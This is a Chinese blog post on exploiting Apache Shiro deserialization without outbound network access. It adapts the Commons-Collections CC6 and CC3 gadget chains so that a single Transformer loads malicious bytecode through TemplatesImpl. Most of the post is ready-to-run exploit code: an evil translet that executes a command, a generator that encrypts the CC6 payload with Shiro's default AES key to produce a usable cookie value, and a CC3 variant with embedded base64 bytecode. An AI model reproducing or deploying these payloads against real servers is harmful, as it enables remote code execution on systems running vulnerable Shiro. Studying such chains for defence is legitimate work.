devbox
笔触狂放9
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

【Web】Java反序列化之CC6&CC3改链不出网打Shiro_shiro不出网怎么打

作者:笔触狂放9 | 2024-06-09 15:45:51

shiro不出网怎么打

目录

前言

简单思考

EXP

CC6链改

CC3链改

前言

shiro反序列化大家都很熟,出网可以打JRMP二次反序列化,但在不出网利用这个漏洞的时候,会发现我们无法在tomcat下直接利用shiro原生的commons-collections:3.2.1

归根结底一句话,就是“如果反序列化流中包含非Java自身的数组,则会出现无法加载类的错误,由于CC链用到了Transformer数组,不是Java自身的数组,导致这条链无法利用”

而CC链中,如何能避开Transformer数组的调用呢,是不用Transformer的Transform方法了吗? 那CC链还能叫CC链吗(

这里我们要关注的点并非Transformer,而是“数组”,即是,要只用一个Transformer来完成命令执行的效果,这样想来,似乎也就不再那么天马行空。

简单思考

一个执行命令的Transformer,可以是InstantiateTransformer配合TrAXFilter来啥啥啥,也可以是用InvokerTransformer来调用可以加载一个类的对象的某个sink点。

藏着掖着也没意思,大伙都猜到了,还得是我们的老朋友TemplatesImpl

我们再来回顾一下CC6,这条链的关键类TiedMapEntry ,其构造函数接受两个参数,参数1是一个Map,参数2是一个对象key。 TiedMapEntry 类有个 getValue 方法,调用了map的get方法,并传入key,当这个map是LazyMap时,其get方法就是触发transform的关键点,最终调用transform(key)

当时似乎传key的时候只要随便传个"keykey"/"valuevalue"就行,因为Transformer数组的第一个对象是ConstantTransformer,不管传什么,其返回值都是设定好的。

OK,那我们退一步,为什么要有ConstantTransformer,师傅们可能会想到“将Runtime对象传递给InvokerTransformer,作为其transform方法的参数”这种答案,这是正确的,因为ConstantTransformer扮演的正是一个对象传递者的角色。

但Shiro反序列化苛刻的条件要求我们只能使用一个Transformer,很遗憾,ConstantTransformer不能为我们所用了。

不过其精神还是在的,LazyMap#get 的参数key,会被传进transform(),它也可以平替ConstantTransformer的角色——一个最简单的对象传递者。

所以我们这次要传的key就不能那么随便了,

对于CC6,它将被指定为TemplatesImpl传入给InvokerTransformer

对于CC3,它将被指定为TrAXFilter传入给InstantiateTransformer,道理是一样的,不再解释

可以看这篇文章:Shiro反序列化结合CC3链使用 - Rainy-Autumn's blog

EXP

CC6链改

  1. // Evil.java
  2. import com.sun.org.apache.xalan.internal.xsltc.DOM;
  3. import com.sun.org.apache.xalan.internal.xsltc.TransletException;
  4. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  5. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
  6. import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
  7.  
  8. public class Evil extends AbstractTranslet {
  9.     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
  10.  
  11.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
  12.  
  13.     public Evil() throws Exception {
  14.         super();
  15.         System.out.println("Hello TemplatesImpl");
  16.         Runtime.getRuntime().exec("calc");
  17.     }
  18. }
  1. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  2. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  3. import org.apache.commons.collections.Transformer;
  4. import org.apache.commons.collections.functors.InvokerTransformer;
  5. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  6. import org.apache.commons.collections.map.LazyMap;
  7. import org.apache.shiro.crypto.AesCipherService;
  8. import org.apache.shiro.util.ByteSource;
  9.  
  10. import java.io.*;
  11. import java.lang.reflect.Field;
  12. import java.util.Base64;
  13. import java.util.HashMap;
  14. import java.util.Map;
  15.  
  16. public class GenePayLoad {
  17.     public static void setFieldValue(Object obj, String fieldName, Object newValue) throws Exception {
  18.         Class clazz = obj.getClass();
  19.         Field field = clazz.getDeclaredField(fieldName);
  20.         field.setAccessible(true);
  21.         field.set(obj, newValue);
  22.     }
  23.     public static byte[] CC11_PayLoad(byte[] clazzBytes) throws Exception {
  24.         TemplatesImpl obj = new TemplatesImpl();
  25.         setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
  26.         setFieldValue(obj, "_name", "HelloTemplatesImpl");
  27.         setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
  28.  
  29.         // 先设置成人畜无害的getClass方法,避免本地调试触发payload
  30.         Transformer transformer = new InvokerTransformer("getClass", null, null);
  31.  
  32.         Map innerMap = new HashMap();
  33.         Map outerMap = LazyMap.decorate(innerMap, transformer);
  34.  
  35.         TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, obj);
  36.  
  37.         Map expMap = new HashMap();
  38.         expMap.put(tiedMapEntry, "xxx");
  39.  
  40.         outerMap.clear();
  41.  
  42.         setFieldValue(transformer, "iMethodName", "newTransformer");
  43.  
  44.         ByteArrayOutputStream baos = new ByteArrayOutputStream();
  45.         ObjectOutputStream oos = new ObjectOutputStream(baos);
  46.         oos.writeObject(expMap);
  47.         oos.close();
  48.  
  49.         return baos.toByteArray();
  50.     }
  51.  
  52.     public static void main(String[] args) throws Exception {
  53.         byte[] codes = ClassPool.getDefault().get(Evil.class.getName()).toBytecode();
  54.         AesCipherService aes = new AesCipherService();
  55.         byte[] key =
  56.                 java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
  57.         ByteSource ciphertext = aes.encrypt(CC11_PayLoad(codes), key);
  58.         System.out.printf(ciphertext.toString());
  59.     }
  60. }

CC3链改

  1. package com.shiroTest;
  2.  
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  4. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
  5. import org.apache.commons.collections.Transformer;
  6. import org.apache.commons.collections.functors.ChainedTransformer;
  7. import org.apache.commons.collections.functors.ConstantTransformer;
  8. import org.apache.commons.collections.functors.InstantiateTransformer;
  9. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  10. import org.apache.commons.collections.map.LazyMap;
  11.  
  12. import javax.xml.transform.Templates;
  13. import java.io.ByteArrayOutputStream;
  14. import java.io.ObjectOutputStream;
  15. import java.lang.reflect.Field;
  16. import java.util.Base64;
  17. import java.util.HashMap;
  18. import java.util.Map;
  19.  
  20. public class CC3 {
  21.     public byte[] getPayload2() throws Exception{
  22.  
  23.         byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAhTGNvbS9UZW1wbGFzdGVzSW1wbFRlc3QvY29kZVRlc3Q7AQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACUBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABjxpbml0PgEAAygpVgcAJgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAZABoHACcMACgAKQEABGNhbGMMACoAKwEAH2NvbS9UZW1wbGFzdGVzSW1wbFRlc3QvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAAPwAAAAMAAAABsQAAAAIACgAAAAYAAQAAABEACwAAACAAAwAAAAEADAANAAAAAAABAA4ADwABAAAAAQAQABEAAgASAAAABAABABMAAQAHABQAAgAJAAAASQAAAAQAAAABsQAAAAIACgAAAAYAAQAAABYACwAAACoABAAAAAEADAANAAAAAAABAA4ADwABAAAAAQAVABYAAgAAAAEAFwAYAAMAEgAAAAQAAQATAAEAGQAaAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAAGAAEABkADQAaAAsAAAAMAAEAAAAOAAwADQAAABIAAAAEAAEAGwABABwAAAACAB0=");
  24.         TemplatesImpl templates = new TemplatesImpl();
  25.         setFieldValue(templates,"_bytecodes",new byte[][]{bytes});
  26.         setFieldValue(templates,"_name","dwa");
  27.         setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
  28.  
  29.         Transformer transformers = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
  30.         HashMap<Object, Object> map = new HashMap<>();
  31.         Map<Object,Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
  32.         //第一个参数的map
  33.         // get方法中调用的是map.get
  34.         // 目的是调用lazyMap中的get方法 所以第一个参数是lazyMap
  35.         TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter"));
  36.         HashMap<Object, Object> map2 = new HashMap<>();
  37.         //hashMap的readObject时会调用hash方法
  38.         // 然后key.hashCode() 会调用key的hashCode方法  key的值为tiedMapEntry
  39.         //调用tiedMapEntry的hashCode然后待用getValue方法 然后调用get方法
  40.         map2.put(tiedMapEntry, "sss");
  41.         lazymap.remove(Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter"));
  42.         Class c = LazyMap.class;
  43.         Field factoryField = c.getDeclaredField("factory");
  44.         factoryField.setAccessible(true);
  45.         factoryField.set(lazymap,transformers);
  46.  
  47.         ByteArrayOutputStream barr = new ByteArrayOutputStream();
  48.         ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
  49.         objectOutputStream.writeObject(map2);
  50.         objectOutputStream.close();
  51.         return barr.toByteArray();
  52.     }
  53.     public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
  54.         Field field = obj.getClass().getDeclaredField(fieldName);
  55.         field.setAccessible(true);
  56.         field.set(obj,value);
  57.     }
  58. }
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/694760
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号